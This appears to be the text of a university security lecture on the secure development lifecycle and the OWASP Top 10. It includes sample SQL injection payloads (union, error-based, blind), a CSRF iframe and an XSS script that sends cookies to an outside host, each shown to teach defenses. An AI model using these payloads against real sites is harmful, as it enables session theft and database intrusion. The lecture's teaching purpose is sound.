Information Security Gabriel Lawrence Director, IT Security UCSD
Director of IT Security, UCSD Three Startups (2 still around!) Sun Microsystems (Consulting and JavaSoftware) Secure Internet Applications
Don t go to jail! Some of the things i m going to talk about are ok against your applications... but would be bad against someone else s.
Internet Security is new... no really. ARPANET first two nodes in 1969, modern infosec didnt roll around until 1988
First Major Worm Morris Worm, 1988 Web Server Worm Code Red, 2001 Web App Worm Asprox, May 2008 Network security- 1988-2008 Web Security (browser and web apps) 2008- Asprox attacked any web app using sql injection.
Protecting assets from risk using people, process and technology What is information security? why do we care?
SDLC Requirements Architecture/Design Coding Integration Testing Deployment Long Term Support Agile development has smaller cycles... but generally software dev follows these major phases Requirements- what you are going to build Architecture/Design - How Coding - Doing it Integration Testing - Making sure the overall build works Deployment - Shipping it Long Term support - You can never really be done!
Where was security again? I know... this guy is supposed to be a security guy and he didnt show it in the SDLC slide... Whats up with that?
Security is part of every step in the SDLC
Requirements concretely define security expectations Data Definition Handling Storage Auth^2 Logging Threat modeling may be a tool to use here depending on how sensitive the application is, how large the development team is, or how formal the methodology is. Could straddle Requirements and Architecture/Design effort. http://www.owasp.org/index.php/threat_risk_modeling 1. Identify Security Objectives Auth^2, How much risk will you take? Reputation? Privacy and Regulatory compliance? Availability? 2. Analyze requirements/app design for components, data flows, trust boundaries 3. Decompose the app to features and modules and identify the ones where security matters 4. Identify threats 5. Decide what you do about them - Different mechanisms to accomplish this...
Architecture/Design should identify security characteristics and critical security features Examples: Userid for database access... normal userid, sensitive userid Identify trusted communication paths and trust boundaries Identify how auth^2 is accomplished and where - universal enforcement
Use secure coding practices Security and Quality are often the same How does your software deal with expected and unexpected inputs? Unit tests should test good and BAD inputs. Threat models? CODE REVIEWS!
Integration Testing is a good point to test the big picture Quality - does it do what its supposed to? does it do other things? Automated tools - Application scanners Hand Testing - Be Evil
Deployment Traditional InfoSec Security around the database userids? N-tier? 1 tier? Firewalls? OS hardening? Log management? Patch Management? Fault Tolerance? Configurations? Vulnerability scanning?
Don t forget about your application Component updates? New threats? New attacks? Biggest risk here!
What does it mean to be evil? Developers and traditional IT tends to think about Does the feature work? Is the system up? Does it do what the user wants? Attackers come at it from a different direction. What happens when i give it bad input? How does it fail? what can i do when its failing? What else can I make this system do? Abusing trust
OWASP and the Top 10 Open Web Application Security Project - owasp.org Top 10 - top 10 risks not top 10 weaknesses
A1 - Injection SQL, OS/Command, LDAP Untrusted data sent to an interpreter as part of a command/query interpreter gets confused about whats data and code and executes some hostile data
... String[] pwordarr = request.getparametervalues ("pword"); if(unamearr.length == 1 && pwordarr.length == 1){ res = stm.executequery("select * FROM users WHERE username = '"+unamearr[0]+"'"); }...
Used to select data from a table Syntax SELECT [ALL DISTINCT] columnname1 [,columnname2] FROM tablename1 [,tablename2] [WHERE condition] [ and or condition...] [GROUP BY column-list] [HAVING "conditions ] [ORDER BY "column-list" [ASC DESC] ]
Select uname,password from users select uname,password from users where uname='gabe' SQL comments, stuff the database ignores select uname,password from users where uname='gabe' -- this is a comment...
"SELECT * FROM users WHERE username = '"+unamearr[0]+"'"
unamearr[0] = gabe Select * from users where username= gabe
unamearr[0] = Select * from users where username= Exception!
Puts the results of two selects together SELECT [ALL DISTINCT] columnname1 [,columnname2] FROM tablename1 [,tablename2] [WHERE condition] [ and or condition...] UNION SELECT [ALL DISTINCT] columnname1 [,columnname2] FROM tablename1 [,tablename2] [WHERE condition] [ and or condition...]
unamearr[0] = union select gabe, pass -- ; Select * from users where username= union select gabe, pass --
;insert into users (username,password) values ('badguy','pass');
Error Based SQL Injection unamearr[0] = union select cast(version () as int), pass -- ERROR: invalid input syntax for integer: "PostgreSQL 8.3.7 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Ubuntu 4.3.3-5ubuntu4) 4.3.3" You can get an actual error message back So... make uselful information appear in the error message NOISY EASY
Blind SQL Injection unamearr[0] = ;select pg_sleep(10) where exists (select table_name from information_schema.tables where substr (table_name,1,1)='p')-- Error is handled by the app, but the SQL is still run Ask a series of Yes/No questions is there a table that has a name beginning with A? is there a table that has a name beginning with B? Long and painful... so write a program :-)
http://sqlmap.sourceforge.net/ http://michaeldaw.org/sql-injection-cheatsheet http://sla.ckers.org/forum/
Parameterized queries Stored procedules/eval! Escape special characters (OWASP ESAPI)
A2 - Cross Site Scripting (XSS) App takes untrusted data and sends it to the browser * User data entered into a form * Data injected into database (see asprox) * Data from external feed Allows attacker to modify web pages, steal data and redirect web browser.
JavaScript First deployed in the browse in December of 1995 Now known as ECMAScript prototype-based scripting language Loosely based on C (the Java in JavaScript is marketing although there is a link between Java and JavaScript they are separate ( languages
JavaScript in the browser Most commonly used in web browsers for client side scripting Also in PDF, Adobe Creative Suite, JDK 1.6, Dashboard Widgets on OSX, Adobe Air Browsers come with standard Objects browser objects: window, document, HTML event handlers Document Object Model XMLHttpRequest
Document Object Model Standard object model for HTML and XML documents Support in all browsers Allows JavaScript to read and change the contents of web pages Defines an event model that allows JavaScript to interact with the user
Communicating across the network JavaScript can load images JavaScript can submit forms iframes XmlHttpRequest Other methods...
JavaScript Security Model Browser has a security policy that governs what JavaScript can do The Same-Origin Policy prevents scripts loaded from one web site from interacting with a document loaded from a different site Scripts loaded from other sites are restricted to the origin that the document that loaded them came from, not the place the script was hosted Same origin applies to accessing embedded documents ( ilayer (Window, iframe, layer, Same origin doesn t prevent script from loading window, iframe, layer, ilayer from another site
Poor Mans Page Defacement document.location on browsers controls the what content is in the current window What would happen if we put <script>document.location="http:// www.cnn.com"</script> in a field that gets stored and shown to users of the site?
Stealing data <script> var myimage = new Image; myimage.src="http:// www.landq.org/"+document.cookie +"---"+document.location; </script>
CSS Javascript HTML JSON Output filtering Different filtering for output destination
But I want HTML formatting! Use wiki markup Getting standard Use HTML entities for odd characters Whitelist Define what tags are allowed Define what attributes are allowed Strip everything else Your code produces the markup, so you are in control
A3 - Broken Authentication and Session Management Jump past the login page No security around assets - images and video streams (performance or because 3rd party package...) Data in session cookies Username? what happens if i change it? Application timeouts... user walks away Does not use SSL/TLS for all traffic - just login? session cookie is stealable. Session ID in urls. Emailed to others... pwned. Watch out for XSS!
Parameter tampering A4 - Insecure Direct Object References http://www.example.com/view.jsp? itemid=10
A5 - Cross Site Request Forgery <iframe src= http://yourbank/transfer.asp? from=checking&to=08809988&amount=10 00000></iframe> Use a random hidden value, or nonce, javascript security model will protect you so that there is a secret parameter that cant be predicted or known by the malicious folks.
A6 - Security Misconfiguration Did you get the deployment step right? Remove all testing code?
A7 - Failure To Restrict URL access Comcast example Auth^2 properly applied? Policies need to be flexible to adapt to business needs. Role based, so you dont have to twiddle every user. Proper business situation for access Default deny!
A8 - Unvalidated Redirects and Forwards user parameters in url includes redirects look like your site, but send you to evil.com
A9 - Insecure Cryptographic Storage Right cryptographic alg? Key management? Data at rest? Using a valid cert (sorta a config issue...)
A10 - Insufficient Transport Layer Protection Session cookies have secure flag set Legit server cert Require SSL... Dont let em land on the non ssl site. Backend communication???
Error Page Handling Set up a global error handler Control the information leaked out Ability to do additional logging and notification Done globally assures that it is applied consistently Not enough to protect from problems
Check out owasp.org
Questions?